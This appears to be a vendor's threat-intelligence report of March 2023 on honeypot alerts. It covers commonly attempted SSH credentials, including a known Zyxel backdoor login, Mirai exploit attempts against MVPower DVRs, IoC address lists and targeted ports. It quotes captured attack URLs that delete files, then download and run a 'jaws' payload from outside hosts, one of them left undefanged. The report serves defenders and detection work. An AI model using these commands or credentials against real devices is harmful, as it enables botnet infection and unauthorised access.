Our selection of alerts on honeypots: report 6 – march 2023

A good understanding of active threats is necessary to achieve a good security posture.  The following report provides actual trends that emerge from the Internet Background Noise. The data are provided using two weeks of our Honeypots logs.

Top credentials tested by cyber threat actors on SSH protocol

In the chart below, you will find the most tested credentials on SSH protocol by cyber threat actors during the past couple of weeks. It is once again a great example of which login/password the threat actors are trying on every device connected to the Internet. First tip : make sure the devices that don’t need to be publicly connected to the Internet are not.

Furthermore, these credentials widely tested in the cyber space are useful intelligence for creating dictionaries of credentials. As an illustration, it will help your cyber security supervisor preventing the use of these basic credentials in the IT systems you are protecting.

LoginPassword
3comcsoRIP000
AdminPassword
ftpuser3245gs5662d34
git3245gs5662d34
oracle123456
oracle3245gs5662d34
oracleoracle123
piraspberry
postgres123456
postgres3245gs5662d34
PSEAdmin$secure$
support123456
telnet123456
ubntadmin
ubuntu123456
ubuntu3245gs5662d34
ubuntu123456
vadmin9vt@f3Vt
zyfwpPrOw!aN_fXp

The last credentials zyfwp/PrOw!aN_fXp refer to the CVE-2020-29583 (CVSSv3 : 9.8) on firmware version 4.60 of Zyxel USG devices and allow to use this account to login to the SSH server or web interface with admin privileges.

Our honeypots – unavoidable victims of Mirai botnet

Weeks after weeks, our honeypots get relentlessly hit by threat actors trying to enroll more and more devices into their Mirai botnet fleet. They target any device connected to the Internet to gather an army of botnet to be the most efficient for massive attacks such as DDoS.

The threat actor use the same User Agent : Hello, world.

In March, our worldwide honeypots were targeted with the following URLs :

/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws

The IP address 94.158.247[.]123 (hosted by AS 39798 MivoCloud SRL – US) included in the URL above is flagged as Mirai botnet for 2023 in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+128.199.134[.]42/jaws;sh+/tmp/jaws

The IP address 128.199.134[.]42 (hosted by AS  AS 14061 DIGITALOCEAN-ASN – SG) included in the URL above is flagged as Mirai botnet in VirusTotal. 55 IP addresses targeted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos[.]fun/jaws;sh+/tmp/jaws

The domain botbet.catbbos[.]fun included in the URL above (created a month ago) is flagged as as Mirai botnet in VirusTotal. 52 IP addresses targerted our worldwide honeypots with this URL request.

/shell?cd+/tmp;rm+-rf+*;wget+45.77.243.49/jaws;sh+/tmp/jaws

The IP address 45.77.243.49 (hosted by  AS 20473 AS-CHOOPA – SG) included in the URL above is flagged as malicious in VirusTotal. 45 IP addresses targeted our worldwide honeypots with this URL request.

The threat actors tried to exploit a Shell Command Execution vulnerability on MVPower digital video recorders which may allow remote attackers to execute commands on vulnerable systems. It is known as the CVE-2016-20016 (CVSSv3 : 9,8).

We found out that 75% IP addresses targeting our honeypots were from Vietnam, the rest being Chinese. 41% of the IP addresses are not known from public databases identifying malicious IP addresses.

Here is the repartition of the AS:

AS%
AS 140803 8, 195 Street, Thang Town, Hiep Hoa, Bac Giang, Viet Nam75%
AS 4134 Chinanet10%
AS 4837 CHINA UNICOM China169 Backbone2,5%
AS 56040 China Mobile communications corporation2,5%
AS 140903 CHINA TELECOM2,5%
AS 4837 CHINA UNICOM China169 Backbone2,5%
AS 4847 China Networks Inter-Exchange2,5%
AS 56040 China Mobile communications corporation2,5%

IoCs :

  • 1.119.168[.]202  
  • 120.237.206[.]76
  • 27.129.128[.]239
  • 60.223.233[.]250
  • 183.237.207[.]140
  • 218.23.126[.]101
  • 218.4.170[.]126
  • 220.180.37[.]203
  • 60.161.138[.]28
  • 60.221.224[.]111
  • 103.178.229[.]142
  • 103.162.28[.]193
  • 103.162.29[.]181
  • 103.162.29[.]185
  • 103.167.196[.]147
  • 103.178.229[.]37
  • 103.167.196[.]181
  • 103.173.157[.]235
  • 103.178.229[.]11
  • 103.178.229[.]131
  • 103.162.28[.]117
  • 103.162.28[.]195
  • 103.162.29[.]52
  • 103.173.157[.]193
  • 103.178.229[.]148
  • 103.161.177[.]39
  • 103.167.196[.]133
  • 103.167.197[.]108
  • 103.173.156[.]252
  • 103.178.228[.]111
  • 103.167.197[.]64
  • 103.173.157[.]229
  • 103.178.228[.]218
  • 103.167.196[.]170
  • 103.167.197[.]116
  • 103.173.157[.]212
  • 103.173.157[.]220
  • 103.173.157[.]234
  • 103.173.157[.]250

Top ports/protocols targeted by threat actors

PortsProtocol
445TCP
22TCP
23TCP
80TCP
6379TCP
9100 & 9115TCP
443TCP
8088TCP
5060UDP
5555TCP

It is good practice to block incoming traffic towards unused ports while open-to-traffic ports are safely monitored and protected.

DoS & DDoS Attempts monitored on our honeypots

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter

CVE-2022-27255 exploit attempts monitored on our honeypots

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots network.

Subscribe to our bi-monthly threat intelligence newsletter


Information remain TEHTRIS sole property and reproduction is forbidden

TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.

No warranty and liability

TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.

Cyber or not Cyber ?

Subscribe to the TEHTRIS newsletter.

Once a month, get the latest cyber news by subscribing to the TEHTRIS newsletter.

To explore the subject

Similar publications

Cyber or not cyber ?

Once a month, receive the essential news and cyber watch by subscribing to the TEHTRIS newsletter.